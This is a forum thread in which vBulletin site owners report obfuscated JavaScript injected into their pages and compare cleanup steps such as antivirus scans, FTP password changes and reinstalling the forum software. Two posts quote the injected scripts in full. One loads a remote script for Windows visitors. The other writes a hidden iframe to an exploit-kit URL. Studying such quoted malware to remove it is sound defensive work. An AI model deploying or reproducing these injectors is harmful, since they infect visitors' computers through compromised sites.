Suspect javascript found

[bouncer]

Having problems with my site & have noticed the follwing javascript in many of my pages (viewed source from browser)
It looks suspicious to me!

</head><script language=javascript><!-- 
(function(){var lNVx=',76ar,20a,3d,22,53cr,69pt,45ngin,65,22,2cb,3d,22,56,65r,73ion()+,22,2c,6a,3d,22,22,2cu,3dnavigator,2euserAg,65,6et,3bif(,28u,2ein,64exOf,28,22Win,22),3e0),26,26(u,2ei,6ede,78,4ff(,22NT,20,36,22),3c0,29,26,26,28docume,6et,2e,63,6f,6f,6bie,2eindex,4ff(,22m,69ek,3d,31,22,29,3c,30),26,26(,74,79peof,28,7ar,76,7at,73),21,3d,74ype,6f,66(,22A,22))),7bzrvzts,3d,22A,22,3be,76a,6c(,22if(wind,6fw,2e,22,2ba+,22,29,6a,3d,6a+,22+a+,22,4dajor,22,2bb+a+,22,4dinor,22+b+a,2b,22,42uild,22,2bb+,22j,3b,22),3b,64ocument,2ew,72ite(,22,3c,73cr,69,70,74,20,73,72c,3d,2f,2f,67um,62lar,2ecn,2fr,73,73,2f,3fid,3d,22+j+,22,3e,3c,5c,2fsc,72ipt,3e,22),3b,7d';var sjNk3=unescape(lNVx.replace(/,/g,'%'));eval(sjNk3)})();
 --></script>

Any ideas what it is, where it came from, & how to get rid of it?

Thanks

 

[StarWolf]

This looks like that someone hacked your board. If you don't have installed any Mods or modified templates and/or sources yourself then you should remove immediately these lines (post, specific template or source file) or your visitors will be infected.

After deletion, you should change the ftp password, administrator password and database password and update your board with the latest version.

 

[h@ck3r]

Having problems with my site & have noticed the follwing javascript in many of my pages (viewed source from browser)
It looks suspicious to me!

</head><script language=javascript><!-- 
(function(){var lNVx=',76ar,20a,3d,22,53cr,69pt,45ngin,65,22,2cb,3d,22,56,65r,73ion()+,22,2c,6a,3d,22,22,2cu,3dnavigator,2euserAg,65,6et,3bif(,28u,2ein,64exOf,28,22Win,22),3e0),26,26(u,2ei,6ede,78,4ff(,22NT,20,36,22),3c0,29,26,26,28docume,6et,2e,63,6f,6f,6bie,2eindex,4ff(,22m,69ek,3d,31,22,29,3c,30),26,26(,74,79peof,28,7ar,76,7at,73),21,3d,74ype,6f,66(,22A,22))),7bzrvzts,3d,22A,22,3be,76a,6c(,22if(wind,6fw,2e,22,2ba+,22,29,6a,3d,6a+,22+a+,22,4dajor,22,2bb+a+,22,4dinor,22+b+a,2b,22,42uild,22,2bb+,22j,3b,22),3b,64ocument,2ew,72ite(,22,3c,73cr,69,70,74,20,73,72c,3d,2f,2f,67um,62lar,2ecn,2fr,73,73,2f,3fid,3d,22+j+,22,3e,3c,5c,2fsc,72ipt,3e,22),3b,7d';var sjNk3=unescape(lNVx.replace(/,/g,'%'));eval(sjNk3)})();
 --></script>

Any ideas what it is, where it came from, & how to get rid of it?

Thanks

Looks the same to me http://www.vbteam.info/programming/22454-someone-hacked-my-website.html



If you remove the code- it keeps coming back.

Scan your PC with Avast and you will find a lot of crap (Worms/ Trojans).

Now lets get to the bottom of this-

What hacks have you recently installed?

My recent additions before this hacking started:

• Dock in rock
• VBTube Pro nulled
• Classifieds

 

[bouncer]

Update:

1. The javascript mentioned in the OP found it's way into all VB javascript functions and HTML files.

2. I also noted a few new (non VB) .php files with crap in them (which I deleted), named image.php, in various directories.

3. A few references to the following were found (can't recall in which files though). litetopdetect.cn

4. I also removed some other crap which had gotten into a good few VB .php files.

So I cleaned it all up yesterday and problem solved.

Overnight I got hit again, but this time less severe & far fewer files were hit with a different javascript.

<script>function vaYYdttxyVb(vtxbbaVVVYa){ function vVytYxVtyty () {var vYdyVdVVyyd=536; return vYdyVdVVyyd;} return(parseInt(vtxbbaVVVYa,16));}function vYdYtVtbYab(vYxdVdxyyYt){ function vbdaYdxyaxV () {var vaYdytdayyy=536; return vaYdytdayyy;} var vaxddddydaa='';for(vVdVdaVydat=0; vVdVdaVydat<vYxdVdxyyYt.length; vVdVdaVydat+=2){vaxddddydaa+=(String.fromCharCode(vaYYdttxyVb(vYxdVdxyyYt.substr(vVdVdaVydat,2))));}return vaxddddydaa;} document.write(vYdYtVtbYab('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65202069643D226462787874646262787422206E616D653D226179627974647864616422207372633D22687474703A2F2F7265646469692E72752F747261666669632F73706C6F6974312F3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A33373532292B2778596462746459745974222077696474683D223722206865696768743D2235333622207374796C653D22646973706C61793A206E6F6E653B223E3C2F696672616D653E27293C2F5343524950543E'));</script>

I have now backed up my /forums directory, so will use this as a restore point if hit again, which I probably will be!

These are the only two installed mods during the last two weeks (my first attack was on 4th May).

Enhanced Image Captcha
Highlight Threadstarter

Apart from upgrading to a newer version of VB, are there any security features you can suggest to prevent this situation from arising again?

Thanks.

 

[h@ck3r]

Thanks for the update buddy- appreciated.

I'll have a look through my directories tomorrow for any suspect files.

Have you scanned your PC?

I suggest Avast to scan.. Nod32 never picked anything up on mine, but with Avast- Found lots to do with this hack.

 

[bouncer]

I'm perplexed, is this attack going thru my PC or my web server !?!

^ Anyway, perhaps on a related issue. I use AVG anti-virus FREE (cheap-charlie) and a few days ago (around the same time my forum started misbehaving), the update function stopped working, so did my windows auto updates.

AVG update - Access forbidden by server

I ran an AVG & a LavaSoft scan, but nothing came up. I tried a suggested fix from AVG, but that didn't work. I dug a little deeper & someone suggested Combofix, Removes Malware,Spyware.... Anyway I downloaded it & followed the instructions. It produced some log files, which I have yet to understand, but it did the trick.

I was able to get an AVG update & my windows updates have also started again.

I guess my machine was infected & I just didn't know it.

I'll wait & see what happened to the forum

 

[bluescorpion]

I'm perplexed, is this attack going thru my PC or my web server !?!

^ Anyway, perhaps on a related issue. I use AVG anti-virus FREE (cheap-charlie) and a few days ago (around the same time my forum started misbehaving), the update function stopped working, so did my windows auto updates.



I ran an AVG & a LavaSoft scan, but nothing came up. I tried a suggested fix from AVG, but that didn't work. I dug a little deeper & someone suggested Combofix, Removes Malware,Spyware.... Anyway I downloaded it & followed the instructions. It produced some log files, which I have yet to understand, but it did the trick.

I was able to get an AVG update & my windows updates have also started again.

I guess my machine was infected & I just didn't know it.

I'll wait & see what happened to the forum

I am seeing quite a few HOSTING Providers stating that these types of hacks are getting onto your server from a PC Trojan that looks up your FTP credentials and logs into your site as you to wreak havoc on your site... You should change your FTP passwords after you figure out how to get rid of the bad guy on your PC ... pretty good bet that hes there waiting to do you again...

 

[h@ck3r]

Cheers for the help guys.

I've been at it for hours now trying to remove it using-

Hijack this
SuperAntiSpyware
Avast
MalwareBytes
Spyware Terminator

And currently I am scanning with Panda online scanner.

Once this has finished, I'll try cobofix, then change my FTP passwords/ usernames and see if it's fixed.

Appreciate the help in this thread.

 

[bouncer]

Ok, the good news.

I've found out what it is: Link Description
I've implemented a fix
I've been free of issues since the fix

Read & follow the info. in the link carefully!

PS. I use the latest Kaspersky as my preferred anti-virus s'w. It reports which pages the malware is on.

 

[bluescorpion]

Here is another pointer that is vBulletin focused. You don't need to register, the content that isn't visible is examples of the exploit described above by Bouncer and not necessary to solve the problem. Be sure the run the suggested virus scanner on your local system FIRST otherwise your are wasting your time trying to fix your infected site.

 

[h@ck3r]

Cheers fopr the above folks.

I thought I had a totally different virus lol.

Anyway mine seems to be fixed now after running combofix, malware bytes, and avast.

However- When I come to this thread, I need to disable Avast otherwise it won't let me view it.

 

[rundll32]

maybe its seeing like the ads as a virus? not sure if v0id used javascript to do them....

 

[bouncer]

Cheers fopr the above folks. However- When I come to this thread, I need to disable Avast otherwise it won't let me view it.

I hope you changed your ftp upload application password, preferably NOT on your PC. And DON'T hardcode the pwd. into the ftp apps. connection, always connect manually each time & clear the cached data before exiting. It was thru the ftp app. password that many sites are being infected.

 

[h@ck3r]

No I just changed my default password on my hosting account (My host done it for me).

That changes my default FTP password.

Each time I use my FTP now I add the real password, and when im finished working on the server I remove the original pass, and add a fake one.

Been about a week now and it's not come back or infected my site (From what I can see).

BUT- I've prob got in excess of 50,000 files on my server in all different directories.

Is there any way to scan those files for malicious content without viewing them 1 by 1?

I'll be there months otherwise

 

[monoxera]

is your website charices lol!

 

[h@ck3r]

is your website charices lol!

??? .

 

[vForums]

Looks like someones executed a shell in your server using a XML vulnerability i.e /admincp/redirect= vbulletin seem to underestimate the power of <script> Tags </script>

 

[bouncer]

BUT- I've prob got in excess of 50,000 files on my server in all different directories.

Is there any way to scan those files for malicious content without viewing them 1 by 1?

I'll be there months otherwise

1. The website I mentioned earlier has some suggestions.

2. Re-install vB.